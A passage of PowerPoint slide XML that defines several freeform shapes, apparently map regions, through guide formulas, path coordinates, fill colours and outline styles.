                  <a:gd name="T17" fmla="*/ 96 h 135"/>
                  <a:gd name="T18" fmla="*/ 11 w 63"/>
                  <a:gd name="T19" fmla="*/ 85 h 135"/>
                  <a:gd name="T20" fmla="*/ 5 w 63"/>
                  <a:gd name="T21" fmla="*/ 82 h 135"/>
                  <a:gd name="T22" fmla="*/ 0 w 63"/>
                  <a:gd name="T23" fmla="*/ 68 h 135"/>
                  <a:gd name="T24" fmla="*/ 8 w 63"/>
                  <a:gd name="T25" fmla="*/ 56 h 135"/>
                  <a:gd name="T26" fmla="*/ 13 w 63"/>
                  <a:gd name="T27" fmla="*/ 50 h 135"/>
                  <a:gd name="T28" fmla="*/ 12 w 63"/>
                  <a:gd name="T29" fmla="*/ 40 h 135"/>
                  <a:gd name="T30" fmla="*/ 12 w 63"/>
                  <a:gd name="T31" fmla="*/ 19 h 135"/>
                  <a:gd name="T32" fmla="*/ 18 w 63"/>
                  <a:gd name="T33" fmla="*/ 10 h 135"/>
                  <a:gd name="T34" fmla="*/ 22 w 63"/>
                  <a:gd name="T35" fmla="*/ 7 h 135"/>
                  <a:gd name="T36" fmla="*/ 30 w 63"/>
                  <a:gd name="T37" fmla="*/ 1 h 135"/>
                  <a:gd name="T38" fmla="*/ 40 w 63"/>
                  <a:gd name="T39" fmla="*/ 2 h 135"/>
                  <a:gd name="T40" fmla="*/ 42 w 63"/>
                  <a:gd name="T41" fmla="*/ 6 h 135"/>
                  <a:gd name="T42" fmla="*/ 46 w 63"/>
                  <a:gd name="T43" fmla="*/ 12 h 135"/>
                  <a:gd name="T44" fmla="*/ 53 w 63"/>
                  <a:gd name="T45" fmla="*/ 6 h 135"/>
                  <a:gd name="T46" fmla="*/ 56 w 63"/>
                  <a:gd name="T47" fmla="*/ 8 h 135"/>
                  <a:gd name="T48" fmla="*/ 50 w 63"/>
                  <a:gd name="T49" fmla="*/ 17 h 135"/>
                  <a:gd name="T50" fmla="*/ 48 w 63"/>
                  <a:gd name="T51" fmla="*/ 24 h 135"/>
                  <a:gd name="T52" fmla="*/ 53 w 63"/>
                  <a:gd name="T53" fmla="*/ 32 h 135"/>
                  <a:gd name="T54" fmla="*/ 58 w 63"/>
                  <a:gd name="T55" fmla="*/ 41 h 135"/>
                  <a:gd name="T56" fmla="*/ 53 w 63"/>
                  <a:gd name="T57" fmla="*/ 49 h 135"/>
                  <a:gd name="T58" fmla="*/ 41 w 63"/>
                  <a:gd name="T59" fmla="*/ 60 h 135"/>
                  <a:gd name="T60" fmla="*/ 42 w 63"/>
                  <a:gd name="T61" fmla="*/ 67 h 135"/>
                  <a:gd name="T62" fmla="*/ 50 w 63"/>
                  <a:gd name="T63" fmla="*/ 74 h 135"/>
                  <a:gd name="T64" fmla="*/ 55 w 63"/>
                  <a:gd name="T65" fmla="*/ 73 h 135"/>
                  <a:gd name="T66" fmla="*/ 59 w 63"/>
                  <a:gd name="T67" fmla="*/ 79 h 135"/>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63"/>
                  <a:gd name="T103" fmla="*/ 0 h 135"/>
                  <a:gd name="T104" fmla="*/ 63 w 63"/>
                  <a:gd name="T105" fmla="*/ 135 h 135"/>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63" h="135">
                    <a:moveTo>
                      <a:pt x="63" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="81"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36079" name="Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2529" y="2786"/>
                <a:ext cx="45" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 45"/>
                  <a:gd name="T1" fmla="*/ 17 h 49"/>
                  <a:gd name="T2" fmla="*/ 9 w 45"/>
                  <a:gd name="T3" fmla="*/ 8 h 49"/>
                  <a:gd name="T4" fmla="*/ 13 w 45"/>
                  <a:gd name="T5" fmla="*/ 2 h 49"/>
                  <a:gd name="T6" fmla="*/ 15 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 49"/>
                  <a:gd name="T8" fmla="*/ 19 w 45"/>
                  <a:gd name="T9" fmla="*/ 1 h 49"/>
                  <a:gd name="T10" fmla="*/ 27 w 45"/>
                  <a:gd name="T11" fmla="*/ 0 h 49"/>
                  <a:gd name="T12" fmla="*/ 31 w 45"/>
                  <a:gd name="T13" fmla="*/ 0 h 49"/>
                  <a:gd name="T14" fmla="*/ 34 w 45"/>
                  <a:gd name="T15" fmla="*/ 2 h 49"/>
                  <a:gd name="T16" fmla="*/ 37 w 45"/>
                  <a:gd name="T17" fmla="*/ 5 h 49"/>
                  <a:gd name="T18" fmla="*/ 40 w 45"/>
                  <a:gd name="T19" fmla="*/ 9 h 49"/>
                  <a:gd name="T20" fmla="*/ 42 w 45"/>
                  <a:gd name="T21" fmla="*/ 15 h 49"/>
                  <a:gd name="T22" fmla="*/ 43 w 45"/>
                  <a:gd name="T23" fmla="*/ 25 h 49"/>
                  <a:gd name="T24" fmla="*/ 45 w 45"/>
                  <a:gd name="T25" fmla="*/ 29 h 49"/>
                  <a:gd name="T26" fmla="*/ 43 w 45"/>
                  <a:gd name="T27" fmla="*/ 33 h 49"/>
                  <a:gd name="T28" fmla="*/ 35 w 45"/>
                  <a:gd name="T29" fmla="*/ 41 h 49"/>
                  <a:gd name="T30" fmla="*/ 30 w 45"/>
                  <a:gd name="T31" fmla="*/ 46 h 49"/>
                  <a:gd name="T32" fmla="*/ 28 w 45"/>
                  <a:gd name="T33" fmla="*/ 48 h 49"/>
                  <a:gd name="T34" fmla="*/ 28 w 45"/>
                  <a:gd name="T35" fmla="*/ 49 h 49"/>
                  <a:gd name="T36" fmla="*/ 23 w 45"/>
                  <a:gd name="T37" fmla="*/ 45 h 49"/>
                  <a:gd name="T38" fmla="*/ 19 w 45"/>
                  <a:gd name="T39" fmla="*/ 42 h 49"/>
                  <a:gd name="T40" fmla="*/ 15 w 45"/>
                  <a:gd name="T41" fmla="*/ 41 h 49"/>
                  <a:gd name="T42" fmla="*/ 15 w 45"/>
                  <a:gd name="T43" fmla="*/ 40 h 49"/>
                  <a:gd name="T44" fmla="*/ 16 w 45"/>
                  <a:gd name="T45" fmla="*/ 38 h 49"/>
                  <a:gd name="T46" fmla="*/ 15 w 45"/>
                  <a:gd name="T47" fmla="*/ 36 h 49"/>
                  <a:gd name="T48" fmla="*/ 11 w 45"/>
                  <a:gd name="T49" fmla="*/ 35 h 49"/>
                  <a:gd name="T50" fmla="*/ 6 w 45"/>
                  <a:gd name="T51" fmla="*/ 31 h 49"/>
                  <a:gd name="T52" fmla="*/ 3 w 45"/>
                  <a:gd name="T53" fmla="*/ 28 h 49"/>
                  <a:gd name="T54" fmla="*/ 0 w 45"/>
                  <a:gd name="T55" fmla="*/ 25 h 49"/>
                  <a:gd name="T56" fmla="*/ 4 w 45"/>
                  <a:gd name="T57" fmla="*/ 23 h 49"/>
                  <a:gd name="T58" fmla="*/ 5 w 45"/>
                  <a:gd name="T59" fmla="*/ 22 h 49"/>
                  <a:gd name="T60" fmla="*/ 5 w 45"/>
                  <a:gd name="T61" fmla="*/ 20 h 49"/>
                  <a:gd name="T62" fmla="*/ 1 w 45"/>
                  <a:gd name="T63" fmla="*/ 19 h 49"/>
                  <a:gd name="T64" fmla="*/ 1 w 45"/>
                  <a:gd name="T65" fmla="*/ 18 h 49"/>
                  <a:gd name="T66" fmla="*/ 1 w 45"/>
                  <a:gd name="T67" fmla="*/ 17 h 49"/>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45"/>
                  <a:gd name="T103" fmla="*/ 0 h 49"/>
                  <a:gd name="T104" fmla="*/ 45 w 45"/>
                  <a:gd name="T105" fmla="*/ 49 h 49"/>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45" h="49">
                    <a:moveTo>
                      <a:pt x="1" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36080" name="Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2529" y="2786"/>
                <a:ext cx="45" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 45"/>
                  <a:gd name="T1" fmla="*/ 17 h 49"/>
                  <a:gd name="T2" fmla="*/ 9 w 45"/>
                  <a:gd name="T3" fmla="*/ 8 h 49"/>
                  <a:gd name="T4" fmla="*/ 13 w 45"/>
                  <a:gd name="T5" fmla="*/ 2 h 49"/>
                  <a:gd name="T6" fmla="*/ 15 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 49"/>
                  <a:gd name="T8" fmla="*/ 19 w 45"/>
                  <a:gd name="T9" fmla="*/ 1 h 49"/>
                  <a:gd name="T10" fmla="*/ 27 w 45"/>
                  <a:gd name="T11" fmla="*/ 0 h 49"/>
                  <a:gd name="T12" fmla="*/ 31 w 45"/>
                  <a:gd name="T13" fmla="*/ 0 h 49"/>
                  <a:gd name="T14" fmla="*/ 34 w 45"/>
                  <a:gd name="T15" fmla="*/ 2 h 49"/>
                  <a:gd name="T16" fmla="*/ 37 w 45"/>
                  <a:gd name="T17" fmla="*/ 5 h 49"/>
                  <a:gd name="T18" fmla="*/ 40 w 45"/>
                  <a:gd name="T19" fmla="*/ 9 h 49"/>
                  <a:gd name="T20" fmla="*/ 42 w 45"/>
                  <a:gd name="T21" fmla="*/ 15 h 49"/>
                  <a:gd name="T22" fmla="*/ 43 w 45"/>
                  <a:gd name="T23" fmla="*/ 25 h 49"/>
                  <a:gd name="T24" fmla="*/ 45 w 45"/>
                  <a:gd name="T25" fmla="*/ 29 h 49"/>
                  <a:gd name="T26" fmla="*/ 43 w 45"/>
                  <a:gd name="T27" fmla="*/ 33 h 49"/>
                  <a:gd name="T28" fmla="*/ 35 w 45"/>
                  <a:gd name="T29" fmla="*/ 41 h 49"/>
                  <a:gd name="T30" fmla="*/ 30 w 45"/>
                  <a:gd name="T31" fmla="*/ 46 h 49"/>
                  <a:gd name="T32" fmla="*/ 28 w 45"/>
                  <a:gd name="T33" fmla="*/ 48 h 49"/>
                  <a:gd name="T34" fmla="*/ 28 w 45"/>
                  <a:gd name="T35" fmla="*/ 49 h 49"/>
                  <a:gd name="T36" fmla="*/ 23 w 45"/>
                  <a:gd name="T37" fmla="*/ 45 h 49"/>
                  <a:gd name="T38" fmla="*/ 19 w 45"/>
                  <a:gd name="T39" fmla="*/ 42 h 49"/>
                  <a:gd name="T40" fmla="*/ 15 w 45"/>
                  <a:gd name="T41" fmla="*/ 41 h 49"/>
                  <a:gd name="T42" fmla="*/ 15 w 45"/>
                  <a:gd name="T43" fmla="*/ 40 h 49"/>
                  <a:gd name="T44" fmla="*/ 16 w 45"/>
                  <a:gd name="T45" fmla="*/ 38 h 49"/>
                  <a:gd name="T46" fmla="*/ 15 w 45"/>
                  <a:gd name="T47" fmla="*/ 36 h 49"/>
                  <a:gd name="T48" fmla="*/ 11 w 45"/>
                  <a:gd name="T49" fmla="*/ 35 h 49"/>
                  <a:gd name="T50" fmla="*/ 6 w 45"/>
                  <a:gd name="T51" fmla="*/ 31 h 49"/>
                  <a:gd name="T52" fmla="*/ 3 w 45"/>
                  <a:gd name="T53" fmla="*/ 28 h 49"/>
                  <a:gd name="T54" fmla="*/ 0 w 45"/>
                  <a:gd name="T55" fmla="*/ 25 h 49"/>
                  <a:gd name="T56" fmla="*/ 4 w 45"/>
                  <a:gd name="T57" fmla="*/ 23 h 49"/>
                  <a:gd name="T58" fmla="*/ 5 w 45"/>
                  <a:gd name="T59" fmla="*/ 22 h 49"/>
                  <a:gd name="T60" fmla="*/ 5 w 45"/>
                  <a:gd name="T61" fmla="*/ 20 h 49"/>
                  <a:gd name="T62" fmla="*/ 1 w 45"/>
                  <a:gd name="T63" fmla="*/ 19 h 49"/>
                  <a:gd name="T64" fmla="*/ 1 w 45"/>
                  <a:gd name="T65" fmla="*/ 18 h 49"/>
                  <a:gd name="T66" fmla="*/ 1 w 45"/>
                  <a:gd name="T67" fmla="*/ 17 h 49"/>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45"/>
                  <a:gd name="T103" fmla="*/ 0 h 49"/>
                  <a:gd name="T104" fmla="*/ 45 w 45"/>
                  <a:gd name="T105" fmla="*/ 49 h 49"/>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45" h="49">
                    <a:moveTo>
                      <a:pt x="1" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36081" name="Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3107" y="1864"/>
                <a:ext cx="151" cy="130"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 151"/>
                  <a:gd name="T1" fmla="*/ 62 h 130"/>
                  <a:gd name="T2" fmla="*/ 19 w 151"/>
                  <a:gd name="T3" fmla="*/ 63 h 130"/>
                  <a:gd name="T4" fmla="*/ 26 w 151"/>
                  <a:gd name="T5" fmla="*/ 59 h 130"/>
                  <a:gd name="T6" fmla="*/ 31 w 151"/>
                  <a:gd name="T7" fmla="*/ 54 h 130"/>
                  <a:gd name="T8" fmla="*/ 36 w 151"/>
                  <a:gd name="T9" fmla="*/ 52 h 130"/>
                  <a:gd name="T10" fmla="*/ 41 w 151"/>
                  <a:gd name="T11" fmla="*/ 54 h 130"/>
                  <a:gd name="T12" fmla="*/ 38 w 151"/>
                  <a:gd name="T13" fmla="*/ 48 h 130"/>
                  <a:gd name="T14" fmla="*/ 40 w 151"/>
                  <a:gd name="T15" fmla="*/ 38 h 130"/>
                  <a:gd name="T16" fmla="*/ 47 w 151"/>
                  <a:gd name="T17" fmla="*/ 32 h 130"/>
                  <a:gd name="T18" fmla="*/ 52 w 151"/>
                  <a:gd name="T19" fmla="*/ 28 h 130"/>
                  <a:gd name="T20" fmla="*/ 56 w 151"/>
                  <a:gd name="T21" fmla="*/ 25 h 130"/>
                  <a:gd name="T22" fmla="*/ 52 w 151"/>
                  <a:gd name="T23" fmla="*/ 21 h 130"/>
                  <a:gd name="T24" fmla="*/ 55 w 151"/>
                  <a:gd name="T25" fmla="*/ 13 h 130"/>
                  <a:gd name="T26" fmla="*/ 60 w 151"/>
                  <a:gd name="T27" fmla="*/ 9 h 130"/>
                  <a:gd name="T28" fmla="*/ 70 w 151"/>
                  <a:gd name="T29" fmla="*/ 10 h 130"/>
                  <a:gd name="T30" fmla="*/ 74 w 151"/>
                  <a:gd name="T31" fmla="*/ 3 h 130"/>
                  <a:gd name="T32" fmla="*/ 81 w 151"/>
                  <a:gd name="T33" fmla="*/ 3 h 130"/>
                  <a:gd name="T34" fmla="*/ 88 w 151"/>
                  <a:gd name="T35" fmla="*/ 6 h 130"/>
                  <a:gd name="T36" fmla="*/ 98 w 151"/>
                  <a:gd name="T37" fmla="*/ 5 h 130"/>
                  <a:gd name="T38" fmla="*/ 98 w 151"/>
                  <a:gd name="T39" fmla="*/ 11 h 130"/>
                  <a:gd name="T40" fmla="*/ 105 w 151"/>
                  <a:gd name="T41" fmla="*/ 10 h 130"/>
                  <a:gd name="T42" fmla="*/ 111 w 151"/>
                  <a:gd name="T43" fmla="*/ 9 h 130"/>
                  <a:gd name="T44" fmla="*/ 120 w 151"/>
                  <a:gd name="T45" fmla="*/ 16 h 130"/>
                  <a:gd name="T46" fmla="*/ 122 w 151"/>
                  <a:gd name="T47" fmla="*/ 20 h 130"/>
                  <a:gd name="T48" fmla="*/ 123 w 151"/>
                  <a:gd name="T49" fmla="*/ 30 h 130"/>
                  <a:gd name="T50" fmla="*/ 121 w 151"/>
                  <a:gd name="T51" fmla="*/ 34 h 130"/>
                  <a:gd name="T52" fmla="*/ 124 w 151"/>
                  <a:gd name="T53" fmla="*/ 42 h 130"/>
                  <a:gd name="T54" fmla="*/ 125 w 151"/>
                  <a:gd name="T55" fmla="*/ 46 h 130"/>
                  <a:gd name="T56" fmla="*/ 134 w 151"/>
                  <a:gd name="T57" fmla="*/ 56 h 130"/>
                  <a:gd name="T58" fmla="*/ 136 w 151"/>
                  <a:gd name="T59" fmla="*/ 65 h 130"/>
                  <a:gd name="T60" fmla="*/ 147 w 151"/>
                  <a:gd name="T61" fmla="*/ 67 h 130"/>
                  <a:gd name="T62" fmla="*/ 149 w 151"/>
                  <a:gd name="T63" fmla="*/ 73 h 130"/>
                  <a:gd name="T64" fmla="*/ 147 w 151"/>
                  <a:gd name="T65" fmla="*/ 78 h 130"/>
                  <a:gd name="T66" fmla="*/ 135 w 151"/>
                  <a:gd name="T67" fmla="*/ 81 h 130"/>
                  <a:gd name="T68" fmla="*/ 128 w 151"/>
                  <a:gd name="T69" fmla="*/ 86 h 130"/>
                  <a:gd name="T70" fmla="*/ 132 w 151"/>
                  <a:gd name="T71" fmla="*/ 96 h 130"/>
                  <a:gd name="T72" fmla="*/ 133 w 151"/>
                  <a:gd name="T73" fmla="*/ 104 h 130"/>
                  <a:gd name="T74" fmla="*/ 132 w 151"/>
                  <a:gd name="T75" fmla="*/ 109 h 130"/>
                  <a:gd name="T76" fmla="*/ 122 w 151"/>
                  <a:gd name="T77" fmla="*/ 111 h 130"/>
                  <a:gd name="T78" fmla="*/ 116 w 151"/>
                  <a:gd name="T79" fmla="*/ 122 h 130"/>
                  <a:gd name="T80" fmla="*/ 115 w 151"/>
                  <a:gd name="T81" fmla="*/ 130 h 130"/>
                  <a:gd name="T82" fmla="*/ 109 w 151"/>
                  <a:gd name="T83" fmla="*/ 125 h 130"/>
